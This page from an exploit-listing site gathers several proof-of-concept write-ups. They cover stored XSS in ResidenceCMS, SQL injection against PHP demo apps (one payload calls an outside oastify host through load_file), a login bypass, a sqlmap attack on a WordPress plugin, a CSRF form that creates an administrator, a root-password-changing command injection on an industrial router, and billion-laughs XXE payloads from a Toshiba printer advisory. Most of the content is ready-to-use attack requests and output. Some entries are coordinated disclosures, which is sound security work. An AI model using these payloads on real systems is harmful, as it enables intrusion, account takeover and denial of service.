Latest exploits :: CodePwn

<pre><code># Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form # Date: 8-7-2024 # Category: Web Application # Exploit Author: Jeremia Geraldi Sihombing # Version: 2.10.1 # Tested on: Windows # CVE: CVE-2024-39143 Description: ---------------- A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered.. Steps to reproduce ------------------------- 1. Login as a low privilege user with property edit capability. 2. Create or Edit one of the user owned property (We can user the default property owned by the user). 3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not. Vulnerable parameter name: property[property_description][content] Example Payload: <img src="x" onerror="alert(document.cookie)"> 4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account. Burp Request ------------------- POST /en/user/property/7/edit HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://localhost Connection: keep-alive Referer: http://localhost/en/user/property/7/edit Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=1 property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg </code></pre>

<pre><code>## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi ## Author: nu11secur1ty ## Date: 07/06/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ 0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1'+(select load_file('\\\\ 0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE (SELECT (CASE WHEN (4671=4671) THEN 0x31+(select load_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+'' ELSE 0x28 END)) AND 'apSt'='apSt Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: id=1'+(select load_file('\\\\ 0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND EXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT (ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1'+(select load_file('\\\\ 0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT 6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi --- ``` ## Reproduce: [href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859) ## Proof and Exploit: [href]( https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html ) ## Time spent: 01:37:00 </code></pre>

<pre><code># Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass) # Date: 6 Jul, 2024 # CVE: N/A # Exploit Author: bRpsd # Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html # Category: Web Application # Version: 1.0 # Tested on: MacOS | Xampp POC: POST http://localhost/banking/classes/Login.php?f=login Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 36 Origin: http://localhost Connection: keep-alive Referer: http://localhost/banking/admin/login.php Cookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=A' OR 1=1#&password=123 Vuln code:/classes/Login.php Vuln parameter:username public function login(){ extract($_POST); $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); if($qry->num_rows > 0){ foreach($qry->fetch_array() as $k => $v){ if(!is_numeric($k) && $k != 'password'){ $this->settings->set_userdata($k,$v); } } $this->settings->set_userdata('login_type',1); return json_encode(array('status'=>'success')); }else{ return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') ")); } } </code></pre>

<pre><code># Exploit Title: Wordpress Video Gallery - YouTube Gallery and Vimeo Gallery Plugin SQL Injection # Date: 2024-07-05 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://total-soft.com/wp-video-gallery/ # Version 2.3.6 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `TS Video Gallery > `Create ` > ` Use Theme` and save it. ``` 2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc 3. Search for orderby parameter. ## SQLMAP COMMAND python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \ wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \ wordpress_test_cookie=WP Cookie check; \ wp-settings-time-1=1720173805" --thread 10 ## RESULT sqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests: --- Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- [08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [08:37:45] [INFO] the back-end DBMS is MySQL [08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End)) web application technology: Apache 2.4.54, PHP 8.0.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) </code></pre>

<pre><code>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities .:. Google Dorks .:. intitle:Cinema Booking System .:. Date: July 5, 2024 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://www.phpjabbers.com/ .:. Product -> https://www.phpjabbers.com/cinema-booking-system/ .:. Product Version -> 1.0 .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ##################### |PRODUCT DESCRIPTION| ##################### "The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code." Vulnerability 1: Authenticated SQL Injection GET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1 host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndex Cookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952 Priority: u=1 Response: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESC LIMIT 0, 10' at line 5 =========================================================================================== Vulnerability 2: Cross Site Request Forgery Risk:Privilege Escalation Proof of concept: <h1>CSRF PoC</h1> <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST"> <input type="hidden" name="user_create" value="1"> <input type="hidden" name="role_id" value="1"> <input type="hidden" name="email" value="test@test.com"> <input type="hidden" name="password" value="123123"> <input type="hidden" name="name" value="test"> <input type="hidden" name="phone" value=""> <input type="hidden" name="status" value="T"> </form> <script type="text/javascript"> document.getElementById('csrfForm').submit(); </script> </body> </html> </code></pre>

<pre><code>CyberDanube Security Research 20240703-0 ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Helmholz Industrial Router REX100 | MBConnectline mbNET.mini vulnerable version| <= 2.2.11 fixed version| 2.2.13 CVE number| CVE-2024-5672 impact| High homepage| https://www.helmholz.de/ | https://mbconnectline.com/ found| 2024-05-08 by| S. Dietz (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently - including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access." Source: https://www.helmholz.de/en/company/about-helmholz/ Vulnerable versions ------------------------------------------------------------------------------- Helmholz Industrial Router REX100 <= 2.2.11 MBConnectline mbNET.mini <= 2.2.11 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2024-5672) A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2024-5672) The following GET request changes the password for the root user and returns the process list of the device. ------------------------------------------------------------------------------- GET /cgi-bin/ping;echo$IFS'root:password'|chpasswd;ps;.sh HTTP/1.1 Host: 192.168.25.11 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Basic aGVsbWhvbHo6cm91dGVy Connection: close Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------------- HTTP/1.0 200 OK This is haserl version 0.8.0 This program runs as a cgi interpeter, not interactively. Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net> Password for 'root' changed PID USER VSZ STAT COMMAND 1 root 2292 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 4 root 0 SW [events/0] 5 root 0 SW [khelper] 8 root 0 SW [async/mgr] [...] Solution ------------------------------------------------------------------------------- Update to latest version: 2.2.13 Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Helmholz customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device. Contact Timeline ------------------------------------------------------------------------------- 2024-05-15: Contacting Helmholz via psirt@helmholz.de. 2024-05-15: Receiving security contact for MBConnectline. 2024-05-21: Contact stated they are working on a fix. 2024-06-13: Received advisory from contact and assigned CVE number. 2024-07-01: Contact sends out final release date. 2024-07-03: Coordinated release of advisory with CERT@VDE. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz / @2024 </code></pre>

<pre><code>Hello, Please find a text-only version below sent to security mailing lists. The complete version on "40 vulnerabilities in Toshiba Multi-Function Printers" is posted here: https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html The text version is also posted here: https://pierrekim.github.io/advisories/2024-toshiba-mfp.txt === text-version of the advisory === -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ## Advisory Information Title: 40 vulnerabilities in Toshiba Multi-Function Printers Advisory URL: https://pierrekim.github.io/advisories/2024-toshiba-mfp.txt Blog URL: https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html Date published: 2024-06-27 Vendors contacted: Toshiba Release mode: Released CVE: CVE-2024-27141, CVE-2024-27142, CVE-2024-27143, CVE-2024-27144, CVE-2024-27145, CVE-2024-27146, CVE-2024-27147, CVE-2024-27148, CVE-2024-27149, CVE-2024-27150, CVE-2024-27151, CVE-2024-27152, CVE-2024-27153, CVE-2024-27154, CVE-2024-27155, CVE-2024-27156, CVE-2024-27157, CVE-2024-27158, CVE-2024-27159, CVE-2024-27160, CVE-2024-27161, CVE-2024-27162, CVE-2024-27163, CVE-2024-27164, CVE-2024-27165, CVE-2024-27166, CVE-2024-27167, CVE-2024-27168, CVE-2024-27169, CVE-2024-27170, CVE-2024-27171, CVE-2024-27172, CVE-2024-27173, CVE-2024-27174, CVE-2024-27175, CVE-2024-27176, CVE-2024-27177, CVE-2024-27178, CVE-2024-27179, CVE-2024-27180 ## Product description > e-STUDIO Multi-Function Printers (MFPs) are fast and productive, providing businesses and organisations the capability to produce what you need, when you need it. > > From https://www.toshibatec.co.uk/workplace-solutions/products-and-solutions/mfps-and-printers/ ## Vulnerability Summary Vulnerable versions: 103 different models of Toshiba Multi-Function Printers (MFP) are vulnerable. It is recommended to visit the official Toshiba advisory (https://www.toshibatec.com/information/20240531_01.html), review the list of affected printers (https://www.toshibatec.com/information/pdf/information20240531_01.pdf) and apply security patches and replace unsupported MFP models. The summary of the vulnerabilities is as follows: 1. CVE-2024-27141 - Pre-authenticated Blind XML External Entity (XXE) injection - DoS 2. CVE-2024-27142 - Pre-authenticated XXE injection 3. CVE-2024-27143 - Pre-authenticated Remote Code Execution as root 4. CVE-2024-27144 - Pre-authenticated Remote Code Execution as root or apache and multiple Local Privilege Escalations 4.1. Remote Code Execution - Upload of a new .py module inside WSGI Python programs 4.2. Remote Code Execution - Upload of a new .ini configuration files inside WSGI Python programs 4.3. Remote Code Execution - Upload of a malicious script `/tmp/backtraceScript.sh` and injection of malicious gdb commands 4.4. Remote Code Execution - Upload of a malicious `/home/SYSROM_SRC/build/common/bin/sapphost.py` program 4.5. Remote Code Execution - Upload of malicious libraries 4.6. Other ways to get Remote Code Execution 5. CVE-2024-27145 - Multiple Post-authenticated Remote Code Executions as root 6. CVE-2024-27146 - Lack of privileges separation 7. CVE-2024-27147 - Local Privilege Escalation and Remote Code Execution using snmpd 8. CVE-2024-27148 - Local Privilege Escalation and Remote Code Execution using insecure PATH 9. CVE-2024-27149 - Local Privilege Escalation and Remote Code Execution using insecure LD_PRELOAD 10. CVE-2024-27150 - Local Privilege Escalation and Remote Code Execution using insecure LD_LIBRARY_PATH 11. CVE-2024-27151 - Local Privilege Escalation and Remote Code Execution using insecure permissions for 106 programs 11.1. 3 vulnerable programs not running as root 11.2. 103 vulnerable programs running as root 12. CVE-2024-27152 - Local Privilege Escalation and Remote Code Execution using insecure permissions for libraries 12.1. Example with `/home/SYSROM_SRC/bin/syscallerr` 13. CVE-2024-27153 - Local Privilege Escalation and Remote Code Execution using CISSM 14. CVE-2024-27154 and CVE-2024-27155 - Passwords stored in clear-text logs and insecure logs 14.1. Clear-text password written in logs when an user logs into the printer 14.2. Clear-text password written in logs when a password is modified 15. CVE-2024-27156 - Leak of authentication sessions in insecure logs in /ramdisk/work/log directory 16. CVE-2024-27157 - Leak of authentication sessions in insecure logs in /ramdisk/al/network/log directory 17. CVE-2024-27158 - Hardcoded root password 18. CVE-2024-27159 - Hardcoded password used to encrypt logs 19. CVE-2024-27160 - Hardcoded password used to encrypt logs and use of a weak digest cipher 20. CVE-2024-27161 - Hardcoded password used to encrypt files 21. CVE-2024-27162 - DOM-based XSS present in the /js/TopAccessUtil.js file 22. CVE-2024-27163 - Leak of admin password and passwords 23. CVE-2024-27164 - Hardcoded credentials in telnetd 24. CVE-2024-27165 - Local Privilege Escalation using PROCSUID 25. CVE-2024-27166 - Insecure permissions for core files 26. CVE-2024-27167 - Insecure permissions used for Sendmail - Local Privilege Escalation 27. CVE-2024-27168 - Hardcoded keys found in Python applications used to generate authentication cookies 28. CVE-2024-27169 - Lack of authentication in WebPanel - Local Privilege Escalation 29. CVE-2024-27170 - Hardcoded credentials for WebDAV access 30. CVE-2024-27171 - Insecure permissions 31. CVE-2024-27172 - Remote Code Execution - command injection as root 32. CVE-2024-27173 - Remote Code Execution - insecure upload 33. CVE-2024-27174 - Remote Code Execution - insecure upload 34. CVE-2024-27175 - Local File Inclusion 35. CVE-2024-27176 - Remote Code Execution - insecure upload 36. CVE-2024-27177 - Remote Code Execution - insecure upload 37. CVE-2024-27178 - Remote Code Execution - insecure copy 38. CVE-2024-27179 - Session disclosure inside the log files in the installation of applications 39. CVE-2024-27180 - TOCTOU vulnerability in the installation of applications, allowing to install rogue applications and get RCE CVE-2024-27171 to CVE-2024-27180 affect the implementation of third-party application system and third-party applications installed by default in Toshiba printers - this is an extremely interesting attack surface for persistence. TL;DR: An attacker can compromise Toshiba Multi-Function Printers using multiple vulnerabilities. List of vulnerable models of Toshiba Multi-Function Printers (103 models): 2021AC, 2521AC, 2020AC, 2520AC, 2025NC, 2525AC, 3025AC, 3525AC, 3525ACG, 4525AC, 4525ACG, 5525AC, 5525ACG, 6525AC, 6525ACG, 2528A, 3028A, 3528A, 3528AG, 4528A, 4528AG, 5528A, 6528A, 6526AC, 6527AC, 7527AC, 6529A, 7529A, 9029A, 330AC, 400AC, 2010AC, 2110AC, 2510AC, 2610AC, 2015NC, 2515AC, 2615AC, 3015AC, 3115AC, 3515AC, 3615AC, 4515AC, 4615AC, 5015AC, 5115AC, 2018A, 2518A, 2618A, 3018A, 3118A, 3018AG, 3518A, 3518AG, 3618A, 3618AG, 4518A, 4518AG, 4618A, 4618AG, 5018A, 5118A, 5516AC, 5616AC, 6516AC, 6616AC, 7516AC, 7616AC, 5518A, 5618A, 6518A, 6618A, 7518A, 7618A, 8518A, 8618A, 2000AC, 2500AC, 2005NC, 2505AC, 3005AC, 3505AC, 4505AC, 5005AC, 2008A, 2508A, 3008A, 3008AG, 3508A, 3508AG, 4508A, 4508AG, 5008A, 5506AC, 6506AC, 7506AC, 5508A, 6508A, 7508A, 8508A, 3508LP, 4508LP, 5008LP. _Miscellaneous notes_: This security assessment was entirely done using a blackbox approach and fully-remote - I only had some IPs of printers (no physical access and no credentials for admin or normal users). Consequently, the physical security of the printers was not analyzed and the vulnerabilities were confirmed with different models running the latest firmware versions (e-STUDIO2010AC, e-STUDIO3005AC, e-STUDIO3508A and e-STUDIO5018A). The vulnerabilities were communicated to Toshiba on June 14, 2023 and communications with Toshiba were very effective. _Impacts_ An attacker can compromise Toshiba multi-function printers (MFP) and execute code. These printers are running Linux and are powerful. They are ideal to host implants (and fun programs, like Bettercap) and move laterally inside infrastructures. _Recommendations_ - - Use network segmentation to isolate MFPs. - - Apply security patches. - - Replace unsupported MFPs. ## Details - Pre-authenticated Blind XML External Entity (XXE) injection - DoS The Toshiba printers use XML communication for the `/contentwebserver` API endpoint provided by the printer. This endpoint is managed by an Apache module located inside the `mod_contentwebserver.so` library. This library provides XML parsing and is vulnerable to a time-based blind XML External Entity (XXE) vulnerability. Using a Billion-laugh attack, we can confirm there is a time-based blind XXE vulnerability. When sending only 1 entity (&lol1) that is defined inside the lolz root element, this &lol1 entity is expanding into 10 entities and the request takes 200ms. With an entity that is expanding into: - - 10^10 entities, the request takes 206ms; - - 10^10^10 entities, the request takes 541ms; - - 10^10^10^10 entities, the request takes 2.7s; - - 10^10^10^10^2 entities, the request takes 8.8s; - - 10^10^10^10^2 entities, the request takes 30.9s; Even if the Apache server displays `MODULE_ERROR:SendRequest failed`, the XML has been successfully evaluated by the `mod_contentwebserver.so` library running in the remote printer. The payload is: POST /contentwebserver HTTP/1.1 Host: 10.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Content-Type: text/plain; charset=utf-8 csrfpId: 10.0.0.2.852d519a6fa9825fae857bac5c003da0 Content-Length: 759 Origin: http://10.0.0.1:8080 Connection: close Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS Cookie: Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS; IgnoreSessionTimeout=1 <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol5;</lolz> Using this HTTP request inside Burp (with a correct session while browsing the printer without authentication), we can modify the entity on the last line; we can see that the XML has been parsed by comparing the time required for the printer to analyze the request. The time will appear inside Burp on the bottom-right of the Window (in red in the following screenshots): [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] With 10^10^10^10^4 entity, then request takes 30 seconds. HTTP requests containing more XML complexity (with a lot of XML entities to be parsed) will DoS the printer and the CPU of the printer will run at 100%. The XML parser is vulnerable to XXE, without authentication. Exfiltration of file over HTTP, FTP and gopher was not obtained as some protections seem to be implemented in the XML parser. ## Details - Pre-authenticated XXE injection The Toshiba printers use XML communication for the `/contentwebserver` API endpoint provided by the printer. This endpoint is managed by an Apache module located inside the `mod_contentwebserver.so` library. This library provides XML parsing and is vulnerable to a XML External Entity (XXE) vulnerability. Using a Billion-laugh attack and correctly formatted data for the printer (with the Toshiba-specific non-public DTD, the tags will be interpreted by the remote printer), we can confirm the presence of a XXE vulnerability. The resulting evaluated XML will be displayed by the printer: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] The malicious payload is (containing a `<X>&lol4;</X>`): POST /contentwebserver HTTP/1.1 Host: 10.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Content-Type: text/plain; charset=utf-8 csrfpId: 10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d Content-Length: 1226 Origin: http://10.0.0.1:8080 Connection: close Referer: http://10.0.0.1:8080/Administration/CreateNewPwd.html Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; IgnoreSessionTimeout=1; clicked=0; addrLastVisited=ADDRBK; Session=10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d; PREF=%7BList%2C8%2CClip boardForPage-%7D; PROGSTAT=0 <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <?xml version="1.0"?> <DeviceInformationModel> <GetValue> <UserManager> <View> <Users/> </View> </UserManager> </GetValue> <SetValue> <UserManager> <View> <Users> <User> <Information> <X>&lol4;</X> </Information> </User> </Users> </View> </UserManager> </SetValue> <Command> <ForgotPassword> <commandNode>UserManager/Users</commandNode> <Params> <userDetails contentType="XPath">UserManager/View/Users/User</userDetails> <cmdDetails commandType="Reset"/> </Params> </ForgotPassword> </Command> </DeviceInformationModel> And the response will be: HTTP/1.1 200 OK Date: Wed, 27 May 2023 10:54:12 GMT Server: Apache X-Frame-Options: SAMEORIGIN Cache-Control: max-age=63072000 Accept-Language: en-US,en;q=0.5 Connection: close Content-Type: text/xml Content-Length: 30465 <?xml version="1.0"?> <DeviceInformationModel> <GetValue> <UserManager> <View> <Users> <User> <Information> <X>lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol[...]lollollollollol</X> </Information> </User> </Users> </View> </UserManager> </GetValue> <Command> <ForgotPassword> <commandNode>UserManager/Users</commandNode> <Params> <userDetails contentType="XPath">UserManager/View/Users/User</userDetails> <cmdDetails commandType="Reset"/> </Params> <Response> <statusOfOperation>STATUS_FAILED</statusOfOperation> </Response> </ForgotPassword> </Command> </DeviceInformationModel> kali% The XML parser is vulnerable to XXE, without authentication. An attacker can exploit the XXE to retrieve information. Exploitability was not analyzed in depth since a RCE was found at the same time: Pre-authenticated Remote Code Execution as root. ## Details - Pre-authenticated Remote Code Execution as root It was observed that the Toshiba printers use SNMP for 